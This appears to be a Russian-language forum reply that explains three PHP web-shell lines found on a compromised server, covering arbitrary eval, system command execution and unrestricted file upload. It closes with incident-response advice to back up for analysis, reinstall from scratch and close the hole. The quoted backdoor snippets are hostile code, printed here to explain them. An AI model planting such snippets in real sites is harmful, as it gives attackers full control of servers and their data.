Для справки:
if($e){eval($e);}
Это позволяет атакующему выполнить любую команду PHP, которую он хочет.
if($s){system($s);}
Это позволяет злоумышленнику выполнить любую системную команду, которую он хочет, как любой пользователь вашего веб-сервера.
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
Это позволяет злоумышленнику загрузить любой файл, который он захочет - снова пользователь, которого запускает ваш веб-сервер, определяет права доступа к файлу.
В итоге, паника: -p
Я уверен, что в Интернете есть много статей о том, как справиться с этим. Вкратце, сделайте резервную копию вашей системы для последующего анализа, переустановите сервер с нуля (вы не знаете, что они еще сделали с вами, поэтому просто удалить файлы недостаточно). затыкать отверстие.